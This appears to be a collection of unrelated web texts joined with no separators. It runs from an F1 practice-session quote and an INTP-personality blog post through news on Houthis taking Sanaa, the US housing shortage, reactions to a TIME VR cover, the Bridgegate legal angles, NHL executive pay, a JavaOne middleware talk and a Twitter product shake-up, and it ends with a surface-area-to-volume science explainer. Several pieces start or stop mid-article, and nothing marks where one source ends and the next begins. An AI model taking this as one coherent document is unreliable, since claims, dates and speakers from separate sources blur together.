Raikkonen, meanwhile, said he didn't think Ferrari had made a mistake in that area - but did say he considered the afternoon sessions too unrepresentative.
He explained: "We know, from every year, it obviously depends a bit on the weather, if it's very hot or not so hot during the daytime... it's a bit of a waste of time, the daytime sessions.
"We have to know what will happen for the evening, work with the car, make the right choices to make it work actually when it matters - and not on the daytime, when it's hot.
"I hardly changed my car, during FP3, I knew it was not ideal in that time of the day - but I knew the places where it's going to improve, it's going to go into those directions - and for us we pretty much kept the car the same."
(WHAT'S NEW: 10/23/15--I've been away for a good bit grappling with new challenges and the next stage of life struggles. But I'm coming back with a new article, and a new idea! It's about the INTP drive for creation and achievement. Along with the new article, I'd like to create a page dedicated to INTPs supporting other INTPs in business. If you need a product or service, why not go to another INTP?? You know will get a person who understands your approach to the world!)
What People Believe about INTP Emotions: Introducing the Hog and his Wash
You probably are quite familiar with the common wisdom regarding INTPs and emotion. It goes something like this:
The preferences of INTPs are thinking (Ti) and intuiting (Ne). INTPs have far less competence with feeling functions, leaving them somewhat cold and unemotional.
You've heard something like that, right? Well, I say hogwash.
At a glance, it might seem like that's the truth, but the reality is very different, much more surprising. In fact, it might shock you. Deep down in the world of the INTP experience, where we can't easily see, we are not un-emotional. Our emotions are actually SUPER-CHARGED.
Displaying emotions is a very different issue than feeling them. For example, you can have a terrible headache without outwardly showing that you're in pain. To understand the complexity of what is going on, we have to challenge the very notion of a "preference." What is a preference really? Let's say you have amazing agility, physical height, and accuracy. You naturally begin playing basketball, and you excel. Is a preference like that? Is it something so good and strong that you can't help yourself from doing it?
I say no, it's not that simple. I'm going to show you that skills only solidify and take shape as a preference when something else comes first. You don't know it's a bright clear day until you've already experienced dark and rainy ones. To fully recognize a strength, you have to compare it to a weakness. And for us, that weakness is hard-rocking, hotel-room-trashing emotions. They can easily be too-hot-to-handle.
The Power of Negative
Let me ask you a question. Which of the following would make a bigger impression on you?
A. A lovely walk in the woods full of fragrant wildflowers.
B. Disturbing a nest of bees and getting stung 3 times.
Which experience is more potent? Which would stick with you more? Which would teach you a more enduring life lesson?
I think B, no?
It's more intense, more arresting. The memory of A might be delectable, but it probably will dissolve into a big pot of similar memories. The information you gathered there will be soft and nebulous. The memory of B, however, is seared into your brain. You remember every step in great detail. It's like someone grabbed the video camcorder that lives in your head and hit record.
Negative is powerful. Pain imprints. We REALLY don't like pain. In fact, we hate it more than we like pleasure. We will analyze situations that cause us pain in an effort to learn how to avoid them in the future.
And therein lies the magic word. Avoid.
The Chicken and the Egg: Preference or Avoidance?
Let's meet Ivan and Irina INTP.
They are cute-as-a-button five year old children. Awww, aren't they sweet?
But already, they are carrying wounds. Particular wounds. They were inflicted by times like these:
*In trying to assemble a complicated toy, they just can't seem to get it right. They get really FRUSTRATED. The feeling that wells up in them is terribly strong. They feel so emotional that it feels like a coming volcanic eruption. They either need to scream, break something, hurt themselves, or cry (or all of the above). All of those things have consequences that they don't want to face (provoking something else, embarrassment, etc.), but the feeling is so strong that they can't hold it back. They might grab handfuls of their hair and pull. Or growl. Yet, their desire (or need) to assemble the toy correctly won't let them stop. Other children just leave behind what is frustrating them or cry for a little bit and move on. The INTP will vent an emotional outburst, then swing from intense anger to intense embarrassment because of what they've done. Big swings. Big highs and big lows.
*In a certain place or with a certain person, they feel enormous feelings of happiness and meaning. It's so powerful that they want to share it with others. But not just share by explaining it like a dissertation. At first, they assume that others feel the same strong emotion and want to feel it together. However, when they reach out and try, it becomes very clear that the feeling is not shared. The rush of positive emotions swings to sharp embarrassment and confusion. Again, the swing is extreme. Other people would be disappointed, but try again later. The INTP may vow never to repeat this very unpleasant experience and never reach out to that person again. Ever.
For INTPs, the emotions can be like carrying a huge, overfull pot of soup. The chaotic swings and the ever present danger of spilling can feel dangerous. We develop a natural desire to Avoid the negative and dangerous ones, to keep the soup from sloshing and knocking the pot out of our hands. We learn to walk carefully, calmly. We try to keep balance.
In general, we believe that all observations contain important information about the workings of the world, including emotions. We turn our rational functions onto our feelings to analyze and understand them, to find their meaning. Even if the raw emotions are positive or otherwise manageable, the process of mixing focused thought with emotion super-charges them. The emotions can feel very deep and meaningful. That's not a problem until we get violated, embarrassed, or not valued. Then, the super-charged emotion blows up like a ticking timebomb. Again, the emotions are primed to be more intense than for other people.
Given that emotions can be radioactive for us, we become adept as using rationality to box in the dangerous animals. Every time they get poked and start pacing in their cage, we use rationality to blanket the emotions and keep them within controlled, safe parameters. In short, our Avoidance has crystallized our rational preferences. We've learned what we're good at, and what we're not.
So why are the seas so stormy for INTPs? First off, it's not our fault. Some people are simply more sensitive to certain stimuli than others. Some people can't stand the smell of perfume. Some can't stand rough fabric on their skin. Some can't stand bright light. For INTPs, the experience of emotions is like listening to music with the volume blasting. We like the music, but if it's too loud, it's painful to the ears. Even if it's not, the blaring music has a tendency to disturb the neighbors. For most types, weathering a bad emotion is like a sailing a lake with choppy water. No big deal. It passes. But for INTPs, it can be like a hurricane. Howling wind and driving spray. You get off the boat looking like Nick Nolte after he was arrested. We learn to become good meteorologists to avoid the storms in the first place.
Some types, namely the idealists, actually wrap themselves in feeling and intuiting for understanding and making decisions. To them, emotions are a guiding light, a best friend. Emotions are the antithesis of danger. Because of that, idealists are our mirror opposites. They trade our thinking functions for feeling functions.
Have you ever asked an idealist to EXPLAIN how they see the world or what their emotions have taught them? Or to summarize all that they've experienced? It's a train wreck. They struggle to string together linear thought and language. They stumble, keep correcting themselves, and talk in circles. Although their emotions are perfectly clear and enduring, their thoughts tangle into huge knots that they can't seem to unravel. And THAT feels bad to them. Their Avoidance is thinking functions (and also sensing functions; however, those aren't our preference either, so we don't differ in that regard). They flee that pain for the safety of their primary competence, feeling and intuiting.
Why the INTP in Your Life is a Treasure
If you are reading this because you love an INTP and he or she is confounding you, I have great news for you! If you're beginning to believe that your INTP is just incapable of loving you like a normal person, this is your lucky day.
Let's say the INTP in your life isn't showing you his or her emotions. There is a simple reason. Your INTP doesn't feel safe enough with you to do so. But don't take it personally. Your INTP probably has reached the point where many of these emotions can't even be "shared" with him or herself.
Yemen's Houthi fighters have tightened their grip on the capital Sanaa after seizing much of the city in a lightning advance and signing an overnight deal to win a share of power, capping a decade-long uprising against the government.
On Monday, the heavily armed rebels raided the house of General Ali Mohsen al-Ahmar and set up checkpoints across Sanaa, as the general and his allies fled and went into hiding.
They also raided the Suhail TV channel's headquarters in the capital, a day after the signing of a UN-brokered peace deal between the government and the Shia rebel group.
The channel belongs to the al-Islah (reform) political party, a Sunni Islamist party which draws support and membership from heavily armed Sunni tribesman, and are instrumental in rallying support behind the army and the government. The Houthis have identified the party as its arch-enemy.
"[The Houthis] are continuing their campaign of revenge against their enemies in the country," said Al Jazeera's Mohamed Vall, reporting from Sanaa.
Houthis celebrated their successful advance in Sanaa with fireworks and gatherings. But our correspondent reported that a car bomb killed "scores" of Houthis who were gathering to celebrate their victories near the Saudi-Yemeni border. No group has claimed responsibility for the attack.
The Houthis had earlier seized a series of strategic installations and key state buildings in Sanaa, though it later handed most of them over to military police, according to the Associated Press news agency.
Hundreds dead
The deal signed on Sunday, called for the formation of a new government within a month, and aimed to bring an end to weeks of clashes and protests that have crippled the capital.
President Abdrabuh Mansour Hadi is required to appoint advisers from the Houthis and southern separatists within three days.
Sanaa's northern and western districts, the scenes of fierce battles over the last week, were damaged by relentless shelling, their buildings pockmarked by gunfire and bodies of slain fighters left on the streets.
At least 200 people were killed on the outskirts of the capital in fighting, the government said Monday.
AFP news agency reported that rescue teams retrieved 53 bodies during the day, "bringing the total pulled by ministry teams since September 16 to 200 bodies," the health ministry said in a statement carried by Saba state news agency.
The Zaidi Shias, who make up 30 percent of Yemen's population of 25 million and ruled a kingdom there for 1,000 years, have complained of being marginalised since their last king in Sanaa was overthrown in a 1962 revolution.
Their strongholds are in the mountainous north of the country.
Donald Trump campaigned on restoring the “American dream,” a 1931 metaphor for economic success that has become political shorthand for homeownership. But as president, Trump faces a unique challenge delivering on that promise: The country is in the grip of a new kind of housing crisis that Washington has virtually no power to solve.
The crisis is a shortage of houses. Nationally, the inventory of homes for sale has been shrinking for 24 straight months, stoking bidding wars for even the lowliest fixer-uppers. In January, a measure of supply hit its lowest in history, according to the National Association of Realtors. That scarcity has helped push the homeownership rate to a near 50-year low. As 83 million millennials approach homebuying age, the shortage is expected to get only worse.
The president claims to have the problem well in hand. “Homebuilders are starting to build again,” he told a cheering crowd in Iowa last month. But that's wrong: Construction is at an eight-month low and builder optimism is waning. There were so few houses for sale in May that buyers pushed prices to a new record high. The scarcity has helped push homeownership among young adults to its lowest in at least a generation, according to Bank of America. Today's millennials are less likely to be homeowners than their parents or grandparents were at their age.
But Washington, which has a centurylong track record of goosing the market to encourage buyers, has almost no leverage when those buyers have nothing to buy. The Trump administration has offered few plans for tackling the problem beyond rolling back a clean-water regulation that raised builders' cost of doing business. Housing and Urban Development Secretary Ben Carson has said building codes need to be updated to pave the way for inexpensive modular homes and other construction innovations, although he hasn't gotten more specific.
The problem they're facing is that American housing policy has always pointed one direction: encouraging people to own their own houses. Subsidized mortgages, tax breaks and, lately, crazy-low interest rates are all designed to boost the market for housing. And the market has usually cooperated: With the government juicing demand, builders swooped in and a steady supply of new houses typically followed.
But in recent years, that dynamic has broken down. Cities and towns that hold sway over residential construction have increasingly been derailing Washington's demand-driven agenda. Ever since New York City pioneered land-use controls a century ago, local laws have tended to rein in homebuilding rather than accelerate it. Today's not-in-my-backyard activists, environmentalists and preservationists are armed with arsenals of local and hyperlocal rules designed to keep development at bay. And the most in-demand cities and suburbs tend to have the tightest restrictions—putting a huge squeeze on people trying to live in the country's most thriving areas.
As the mismatch between local and federal policies starts to look more like a collision, economists and housing leaders, including Mark Calabria, a top Trump administration official, and Shaun Donovan, Barack Obama's HUD secretary, have sounded the alarm. But a fix might be out of Washington's hands. “These rules are made at the micro, micro level,” said Harvard economist Edward Glaeser. “The federal ability to override local regulation is really pretty minimal.”
In job centers large and small, a lack of residential construction is reaching crisis proportions, prompting workers to shun high-cost cities such as Denver and San Francisco for more-affordable living in places like Atlanta and Dallas. It's a historic shift. In the past, America's urban economic engines were also construction boomtowns. From 1880 to 1910, Chicago's population grew by an average of 56,000 each year, according to Glaeser. By contrast, from 1980 to 2010, as San Francisco was blossoming into the world's tech capital, its population barely changed: annual growth averaged only 4,200.
Scarcity has home prices rising at a rapid clip. From 2011 to 2016 — a period of economic sluggishness and weak wage growth—the median price of a new home went up nearly 34 percent, to $348,900.
“If we want housing to be more affordable, we need more houses,” said Sam Khater, deputy chief economist at CoreLogic, a housing data provider. “From a federal perspective there's nothing being done.”
WHAT COULD BE do? The problem is, not much. Americans have repaired their credit since the financial collapse, and there's no lack of appetite for homes, but the federal housing agenda is still fixated on boosting demand from buyers. Its toolkit consists of levers such as preserving homeowner tax breaks, access to credit, and the 30-year, fixed-rate mortgage—an American innovation that owes its existence to government-controlled Fannie Mae and Freddie Mac.
Federal policy has less to offer the supply side of the equation—builders—and the economic recovery has less been less kind to them. The number of homebuilding companies shrank 50 percent from 2007 to 2012, according to the most recent Census data, hitting their lowest level since 1997. The industry has yet to recover.
Those builders that remain can't break ground fast enough to keep up with demand. They lack skilled workers, who fled the business during lean years and never came back. Smaller banks stunned by the housing collapse and flood of regulation that followed aren't eager to offer development and construction loans. The cost of materials has skyrocketed and is bound to rise even more after the Trump administration said it would impose tariffs of up to 24 percent on Canadian lumber.
Calabria, chief economist to Vice President Mike Pence and an administration point person on housing, has warned about the inability of cities and counties to respond to big swings in buyer demand and population growth. Calabria is an advocate of zoning deregulation— he called land use a “crucial economic issue” for the whole country—but absent a big new idea or profound shift in thinking, the administration has little power to force localities to liberalize land-use laws.
Calabria, who is assembling a team to develop the Trump administration's plan for housing reform, didn't respond to questions about what he has in mind. Last fall, he tipped his hat to Obama after the president tried to jawbone cities and counties into easing up on zoning restrictions. “There are a lot of very strong economic reasons to worry about the constraints on housing supply that go beyond housing affordability,” Calabria told POLITICO. “It reduces mobility, it adds inequality.”
Indeed, a lack of residential construction is one reason Americans on the economic margins are still struggling after eight years of economic growth. Entry-level homes are seeing the biggest price gains, according to Khater, so the inventory crunch has hit lower-income households and first-time buyers the hardest.
WHAT NOW? TRUMP has few easy options. At the federal level, builders are pinning their hopes on infrastructure spending, looser bank rules and an immigration bill that will draw foreign workers back into construction, though it's not likely those priorities can get political traction in Congress.
Washington, of course, can dial back its demand levers. Affordable housing groups are lobbying to cut the mortgage interest deduction, a tax break that flows largely to the wealthy and encourages people to buy bigger, more expensive houses, but they're up against a deep-pocketed and powerful housing lobby, including bankers and real estate agents, aiming to preserve the status quo. Then there's the risk that congressional tinkering with tax or mortgage rules could cause home prices to fall or sales to slow, a shift that would be felt well beyond Middle America, to Wall Street and the foreign investors who hold billions of dollars in U.S. home loans. That's one reason Congress still hasn't tackled mortgage reform nearly nine years after the crisis.
That leaves the supply side of the equation. Trump could, like Obama, use his bully pulpit to make the case for local land-use deregulation, a message that would appeal to libertarian ideals and cheer progressives fighting for more affordable housing.
But the best hope for a policy fix might lie somewhere between the White House and Main Street. States have the authority to curb local power and some, including Massachusetts, have already tried. Massachusetts builders can win zoning flexibility if they build affordable housing units where prices are high, for example. The state also can levy financial penalties against high-cost communities that refuse to greenlight new construction.
“I don't think there's anything in the Constitution that gives the federal government the right to override local rules,” Glaeser said. “The place you can make a difference is the statehouse.”
And a new breed of local revolutionaries outside the Beltway is doing what the federal government can't — challenging the not-in-my-backyard establishment. A coalition of California renters established the YIMBY Party, which is taking root against NIMBYism in Denver, Austin and other high-cost cities. YIMBYs — it stands for “yes, in my backyard” and isn't an actual political party — claimed their first victory last summer when they blocked a San Francisco ballot initiative that would have subjected zoning decisions to hyperlocal control.
While the group is focused on affordable rentals, its pro-growth agenda calls for higher density housing that will lift homeowners and tenants alike.
“The U.S. government has been totally hands-off with this,” said Sonja Trauss, the YIMBY Party's 35-year-old co-founder. “Someone has to get involved.”
Ok, this looks bad. TIME magazine recently released its latest cover (Vol. 186 No. 6) and cover story this week of the growing prominence of VR. The publication took a shot of Palmer Luckey, creator of Oculus Rift, using his creation in the backdrop of a beach looking awkward and barefoot.
Now, Luckey loves the casual look. Awkward VR use isn't new, and Luckey's barefoot-showing attire isn't either, as he shows up in public and profession outings with his feet out in the open.
What is new is the completely ridiculous TIME cover of him taking both his foot comfort and goofy VR photos up to 11. While the content of the writing is subject to some out of touch and incredulous speak nowadays, the incredible amount of parodies and photo-editing use the internet got out of the cover is blissful. Soak it in, folks.
The initial reactions:
Did @TIME just kill VR with this cover photo? pic.twitter.com/fknnhCj6qD — Noodlecake Games (@NoodlecakeGames) August 6, 2015
This TIME cover is the worst PR that virtual reality could ever have. Everyone involved is fired. pic.twitter.com/o0Ph7L28xA — George Broussard (@georgeb3dr) August 6, 2015
Then the majestic photoshops:
Then the pop culture references:
I… had… the time of my life pic.twitter.com/7ptZsru3s8 — I have an ant head (@joffeorama) August 6, 2015
Then the TIME-exclusive wave six Amiibo was confirmed:
The Palmer Luckey amiibo looks pretty dope pic.twitter.com/NJIk1VzqRn — Dalibor (@DaliDimovski) August 6, 2015
Then Some tried to make sense of the cover with perspective:
That TIME cover is just upholding a long VR tradition of making people look like doofuses for no reason. pic.twitter.com/5SdbJYKDB7 — Chris Person (@Papapishu) August 6, 2015
VR is going to look dorky to an observer. There is no way around that. Embrace it. — Scott Nichols (@Duckols) August 6, 2015
Then the only logical reasoning for the photo:
Then the shameless self-promotions:
The @TIME cover with Palmer Luckey is amazing and really, really odd. So we photochopped it: http://t.co/EnvsNqnJ7Vpic.twitter.com/KuZqywjasg — Jessica L. Conditt (@JessConditt) August 6, 2015
Then, oh, come on now.
https://twitter.com/GAK/status/629373185704783873/photo/1
The next big question in the George Washington Bridge scandal that has rattled New Jersey Gov. Chris Christie: determining whether or not anybody should be charged with a crime.
The U.S. attorney has opened a preliminary inquiry after a referral from the inspector general at the Port Authority of New York and New Jersey, which had been investigating the matter. David Wildstein, the disgraced Christie appointee at the heart of the scandal, repeatedly invoked his right to remain silent during an oversight hearing with state lawmakers. The journey toward uncovering any potential criminality is well underway.
But where does it end? Legal and ethics experts caution that we don't have enough information to predict with much certainty. But based on what is known, they suggest a few potential threads to follow.
You've got a right to drive!
Interfering with peoples' ability to drive between states by closing lanes on the George Washington Bridge between New York and New Jersey might be a crime on its own.
Law professors at two different schools pointed TPM to federal civil right laws, in particular Section 241 of Title 18 of the U.S. Code, which begins:
If two or more persons conspire to injure, oppress, threaten, or intimidate any person in any State, Territory, Commonwealth, Possession, or District in the free exercise or enjoyment of any right or privilege secured to him by the Constitution or laws of the United States, or because of his having so exercised the same …
According to Supreme Court precedent, your right to interstate travel is protected under the above statute, said Frank Askin, a professor at Rutgers University School of Law. Federal civil rights statutes also treat the use of federal interstate highways as a protected activity.
In the bridge scandal, the now-infamous “Time for some traffic problems in Fort Lee” email sent from a Christie aide in the governor's office to a Christie ally at the Port Authority could arguably establish a conspiracy, said Burt Neuborne, a professor at New York University School of Law. Neuborne portrayed a charge based on these statutes as close to a slam dunk.
“The real question is a more prosecutorial discretion,” he said. “Is this low-level harassing kind of activity such a terrible thing? You have to decide whether you want to unload the heavy artillery.”
The usual suspects (obstruction of justice, official malfeasance, etc.)
Some of the common charges that arise whenever public corruption cases develop could arise again here, said Askin and Robert Del Tufo, a former U.S. attorney and New Jersey attorney general.
Government officials using their position of authority for nefarious ends provides the basis for those charges. Del Tufo noted that obstruction of justice charges could potentially be applied to efforts to thwart the state legislative investigation into the bridge closures. In particular, the documents that were given to state lawmakers that revealed the connection to Christie's office were reportedly heavily redacted by a David Wildstein, a key Christie ally at the center of the scandal.
Given the nebulousness of those catch-all charges, that might be enough.
“That could fall within the obstruction rubric as well,” Del Tufo said.
And really … murder?
“I think it would be good for someone to assess the circumstances of that 91-year-old woman,” Del Tufo said, referring to a report that emergency services were delayed because of the bridge closures, including one ambulance carrying an unconscious elderly woman who later died at the hospital.
For what it's worth, the woman's family told the New York Times that they believed she had died in her home and the bridge closures had no effect on her death. But, depending on the ultimate circumstances, Del Tufo said that either criminally negligent homicide or involuntary manslaughter could be in play if the closures did contribute to her death.
Bettman's NHL compensation tops $9.6 million
NHL Commissioner Gary Bettman earned more than $9.6 million in salary and benefits during the league's 2013-14 season, an increase of about $800,000 from the previous year, according to the league's most recently released annual tax filing.
Bettman's reported compensation includes payments defined as salary, deferred compensation, other compensation and nontaxable benefits. His base salary was $9,490,438.
Commissioner Gary Bettman
The filing covers the period of July 1, 2013, through June 30, 2014. That 12-month span includes the league's first full season back following the lockout-shortened 2012-13 NHL campaign.
Bettman's compensation for the year that included the lockout-abbreviated season was $8,854,610. His pay during the year covering the prior, full 2011-12 season was $8.3 million, according to the tax filings for those seasons.
The NHL's annual tax filing covers the league's central business operations and does not include the team-level business that plays a part in setting the league's total revenue for a season. Additionally, the filing does not include the revenue and expenses of NHL Enterprises or the NHL Network, which are not tax-exempt groups and therefore do not have the same IRS filing requirements.
In the most recent tax filing, the league reported a loss of $8.47 million for its fiscal year, compared with a loss of $71.87 million for the year prior, which included the lockout-shortened season. It reported a $3.6 million annual loss prior to that, for 2011-12. While total revenue increased year-over-year from $41.16 million in 2012-13 to $124.38 million in 2013-14, expenses also increased, from $113 million to $132.8 million, respectively.
NHL EXECUTIVE COMPENSATION EXECUTIVE TITLE COMPENSATION* Gary Bettman Commissioner $9,617,464 Bill Daly Deputy commissioner $3,121,594 John Collins Chief operating officer $2,209,569 Colin Campbell Senior EVP, hockey operations $1,620,004 Craig Harnett Chief financial officer $1,279,276 David Zimmerman EVP, chief legal officer and general counsel $951,006 Joseph DeSousa EVP, finance $742,274 David Proper EVP, media distribution and strategy $602,922 Stephen Walkom SVP, director of officiating $547,955 * Figure includes salary, deferred compensation, other compensation and nontaxable benefits.
Note: For the 12-month period ending June 30, 2014.
Source: NHL tax filing
When including revenue from the teams, NHL Enterprises and NHL Network, the NHL in total had approximately $3.7 billion in revenue for its 2013-14 season. The league is forecasting more than $4 billion in revenue for the current season and in excess of $4.5 billion by the 2017-18 season.
The 2013-14 period featured the launch of the outdoor Stadium Series. The NHL also announced its 12-year, $4.9 billion (U.S.) Canadian media rights deal with Rogers Communications in October 2013, though that deal did not take effect until the start of the 2014-15 season.
The NHL declined to comment on the filing.
The league employed 669 people during the reported fiscal year, up from 644 the previous year. A number of its other key executives in addition to Bettman saw increases in compensation as well.
NHL Deputy Commissioner Bill Daly saw his compensation increase to $3.1 million in 2013-14, up from $2.98 million during the previous year. Chief Financial Officer Craig Harnett's compensation increased roughly $100,000, to $1.2 million.
Chief Operating Officer John Collins saw an increase in base compensation from $859,258 to $1.4 million, but he received less in bonus and incentive compensation that was tied to the league's business growth; his total compensation was $2.2 million in 2013-14, compared with $2.3 million in the previous year — which is when the league signed its 10-year, $2 billion rights deal with NBC Sports Group.
Stephen Walkom, who rejoined the league as a senior vice president and director of officiating in August 2013, earned $547,955 in total compensation.
The league also reported its five highest-paid contractors, four of which provided legal services. Skadden Arps was compensated $13.3 million for work it did for the NHL, while Proskauer, Covington & Burling, and Blake, Cassels & Graydon were compensated a combined $5.2 million. Ernest & Young was the fifth-highest-compensated league contractor, at $693,464.
The NHL is the lone North American major professional sports league that continues to hold tax-exempt status. The NFL dropped its tax-exempt status earlier this year; MLB ended its tax-exempt status in 2007. The NBA and MLS have not previously held tax-exempt status that would make similar tax filings available for them.
Like every year, I attended JavaOne (part of Oracle World) in San Francisco in late September 2016. This is still one of the biggest conferences around the world for technical experts like developers and architects.
I planned to write a blog posts about new trends from the program, exhibition and chats with other attendees. Though, I can make it short: Besides focus on Java platform updates (Java 9, Java EE 8, etc.), I saw three hot topics which are highly related to each other: Microservices, Docker and Cloud. It felt like 80% of non-Java talks were about these three topics. The other 20% were Internet of Things (IoT), DevOps and some other stuff. Middleware was also a hot topic. Not always directly, but I was in several talks focusing on integration, orchestration of microservices, (IoT) gateways.
My Talk at JavaOne 2016: Cloud-Native Microservices and Containers in the Middleware World
No surprise that my talk this year also focused on these hot topics – specifically focusing on middleware. However, the focus was a different one than most other presentations: I talked about the journey, which middleware has to undergo these days.
I discussed the move from a classical middleware – often called Enterprise Service Bus (ESB) – to cloud-native middleware microservices. These sessions explained the relation to new concepts like Docker containers, DevOps, and modern open source cloud platforms like CloudFoundry, Kubernetes or Apache Mesos.
Is Middleware still necessary in the Era of Cloud and Microservices?
Interesting side note: Some attendees asked me: “Is middleware even needed after everybody moves to microservices”? I get the same question often. Not just at conferences, but also from customers.
One of these guys already answered the question by himself before I could respond: “Well, as there are so many independent microservices, different technologies, cloud services and edge devices like IoT, I think the answer is YES, there is still a need for middleware, right?!”.
I added to this: “I can assure you: The answer is YES. You need even more middleware than before. You need to interconnect everything! Within your enterprise, remote edge IoT devices, partner services, with cloud services, and also open it up for the external world, i.e. users you do not even know today…
However, middleware changed in the last years. It is not the heavyweight central platform anymore, but a hybrid integration platform, which serves all the various use cases and different audience (like integration specialists, ad-hoc integrators, and even business users). The tooling got more lightweight, and cloud-native!
10 Lessons Learned from Building Cloud-Native Middleware Microservices
In addition to focusing on many related concepts, technologies and cloud platforms, my session also discussed ten lessons learned from building cloud-native middleware microservices together with our customers in the last months:
On premise will not die. Not everything will or should go to the cloud! Tools (visual coding) works, even for very complex scenarios. Forget the early 2000 SOA days! Microservices are not free lunch. They do not fit into every scenario! Design Microservices with open APIs in mind! Cloud-Native means much more than a “cloud-washed” application deployed to a cloud provider! Microservices and Containers are often used together, but also work very well without each other! Containers are a lower level technology. Only the infrastructure provider should care, but not the application developer! Be cloud platform agnostic. The world changes fast! Automation (CI / CD / DevOps) and the related cultural change is key for success. Especially for Cloud-Native Microservices! Establish a hybrid integration architecture to solve different business requirements!
I will publish a more detailed post about these 10 lessons learned soon.
Slide Deck from JavaOne 2016 about Cloud-Native Middleware Microservices
Here is my slide deck from my JavaOne presentation:
Live Demo: Build and Deploy a Middleware Microservice with Docker, Kubernetes, Cloud Foundry, Consul, Spring Cloud Config
The following 20min live demo shows how to deploy a single (i.e. built just once) TIBCO BusinessWorks Container Edition microservice to different cloud and container platforms: Docker, Kubernetes and Pivotal CloudFoundry. The video also shows how to leverage other cloud-native open source frameworks such as Consul and Spring Cloud Config for distributed configuration management and service discovery of middleware microservices.
As always, I appreciate any comments or feedback…
[Originally posted on Kai Waehner's blog – JavaOne 2016 Trends: Cloud, Containers, Microservices]
Trends at JavaOne 2016: Microservices, Docker, Cloud
Twitter's consumer product boss Jeff Seibert, who just took over Twitter's core product team back in September, is no longer running Twitter product, according to multiple sources. Seibert, who co-founded Crashlytics, will go back to running Twitter's developer product suite Fabric, which he was doing before the promotion in the fall.
Twitter does not have a permanent replacement for Seibert, and is opening up a search to fill the role, according to sources. Ed Ho, a senior engineering director who has been at Twitter for two years, will take over Twitter's product on an interim basis.
A spokesperson confirmed the moves, and offered this statement:
"This year we're focused on delivering on five product priorities — refining our core service, live-streaming video, creators, safety, and developers — as well as recruiting great talent. We've successfully increased our shipping cadence on our core service and have asked some of our top leaders to take on key roles in the other priority areas."
Seibert was the fourth person to run Twitter's core product since early 2014. He took over the day-to-day consumer product responsibilities from then-VP of Product Kevin Weil, who would later move on to take the same role at Instagram as part of a massive executive exodus from Twitter in January. Seibert's appointment was the first major restructuring move by CEO Jack Dorsey, who was still technically "interim" CEO at the time.
Now Seibert is out, or at least relocated, and joins a long list of Twitter product bosses who have either left or been pushed out in the past two years. It's a position that Twitter can't seem to lock down — The Verge's Casey Newton once likened it to the Defense Against the Dark Arts post in the "Harry Potter" series, where no professor seems to survive longer than a year.
That, of course, is a major problem for any consumer tech company, but especially for Twitter, which is having a tough time adding new users, thanks in large part to a product that many people think is too hard to use. Dorsey has been vocal about the need to change that, but it will be hard without a stable, permanent product leader in charge.
As part of the change, Twitter is also adding a new branch to its product team, which will work with and help important users and influencers who create content for Twitter. The team will be led by engineering VP Jeremy Rishel, who joined Twitter in 2013 when it acquired Bluefin Labs.
Bernie's Basics
The unsexiest thing in science
Surface area to volume ratio might sound pathologically boring, but it's behind everything from exploding flour and skyscrapers to rock 'n' roll mice.
Most of the big ideas in science have the decency to confine themselves to one or two disciplines. Evolution is strictly in the biological realm. E=mc2 wouldn't be caught dead outside physics. And you really need a hammer in your shorts to talk plate tectonics.
But the simple relationship between any object's surface area and volume infiltrates every field of science and engineering.
It's a major factor in the shape and size of everything from plants and animals to skyscrapers. It puts the ceiling on how big a living cell can be, makes otherwise innocuous baking ingredients explosive, and it's the reason your intestines are the size of a tennis court.
It's as essential to design in nature as a black t-shirt and nerd glasses are to design everywhere else.
So what's it all about?
Basically it means that as things get bigger, their inside (volume) gets bigger than their outside (surface area). And it's not just some random relationship. If you double the width of a thing, its surface area gets four times bigger (22), and it can hold eight times the volume (23). Make the thing ten times wider and its area grows 100 times bigger (102), while its volume is 1000 times greater (103). Whatever factor you increase the length, width or radius by, the area increases by that factor squared, and the volume by that factor cubed.
Galileo was the first to write about the square vs cube relationship. In a burst of anti-creativity he called it the square-cube law, and engineers usually use that term. In biology and chemistry, surface area to volume ratio is the preferred lingo, but they're all describing the same relationship. And the reason they all bang on about it is that the relationship holds for all shapes, not just your standard spheres and boxes. Wherever you are, whatever your science, bigger versions of things have relatively small surface areas, and vice versa.
Which begs the question: so what?
And the answer to that is: so pretty-well everything. Starting with chemistry.
Surfaces are where chemistry takes place, and the bigger the surface area the faster that chemical reactions take place. Small things have a big surface area compared to their size, so breaking a big thing down into lots of smaller parts means you can really ramp up the speed of the reaction. Which is why kitchen staples like flour and custard powder make great explosives. Clumped together they're as harmless as any other carb you don't swallow. But add a decent puff of air and a spark and you've suddenly got a crazy amount of surface area (thanks to billions of tiny particles) just waiting to burn in the surrounding oxygen. Every year people are injured or killed by dust explosions in flour mills and granaries — powdered carbs are more explosive than coal dust thanks to their enormous surface area.
Even smaller than incendiary custard powder, nanoparticles take surface area to the extreme. Their minute size (100 nanometres max) means a massive surface area, which makes them way more reactive than their upscale versions. An entire new science — nanochemistry — was born to nut out the full range of their tricks.
^ to top
Keeping your cool
Reactions aren't the only things that happen at surfaces — it's also where heat gets transferred. Everyone knows elephants have got big ears — and it's not because Noddy won't pay the ransom. The big surface area of those hairy grey flaps gives elephants their best shot at cooling down quickly. And all those wrinkles aren't for show — they add extra cooling surface. The bigger an animal (or anything that generates heat) is, the less surface area it's got to lose heat through, so cooling strategies are all-important.
Small warm-blooded animals have got the opposite problem — the square-cube law means they've got a big heat-leaking surface area for their size. They lose so much heat to the environment that they have to eat a huge amount of food each day (up to their own bodyweight) just so they don't die from hypothermia. That huge metabolic rate makes for a high heart rate, and because mammalian hearts are only good for about one billion beats, that cracking heat-replacing pace is what gives mice a very rock'n'roll live fast, die young lifestyle.
But the surface area to volume ratio doesn't just affect an organism as a whole, it controls how big its individual cells can grow, and affects the shape and structure of its organs.
^ to top
Limits to growth
Our cells need food and oxygen delivered, and waste and CO 2 taken away. The only way in or out is through the cell membrane, either by diffusion (where small molecules pass through the membrane from the side where they're at the highest concentration), or by being pumped or dragged across the membrane itself. Either way, the size of the membrane compared to the size of the cell is critical.
The amount of 'food' and oxygen that can get into the cell determines how active the cell can be — it needs those materials for its reactions. Big cells have got relatively small membranes, so less material can pass in and out of the cell in any given time. It's that single limiting factor that means regardless of whether you're talking mouse or elephant-sized animals, our cells don't get much bigger than about 100 micrometres.
Animal cells are never too far from a capillary — a very skinny blood vessel with an incredibly thin wall. The long skinny tube shape of capillaries gives them a big surface area compared to their volume, which makes them ideal for leaking oxygen and nutrients to the surrounding tissues, and sucking up waste. And they get that food and oxygen from two organs that punch way above their weight when it comes to surface area per unit volume.
Our lungs are ridiculously intricate layers of tiny sacs called alveoli that are just one cell layer thick. If you could unravel a pair of lungs you'd have extreme patience, messy clothes and a single membrane that would cover a tennis court, and then some.
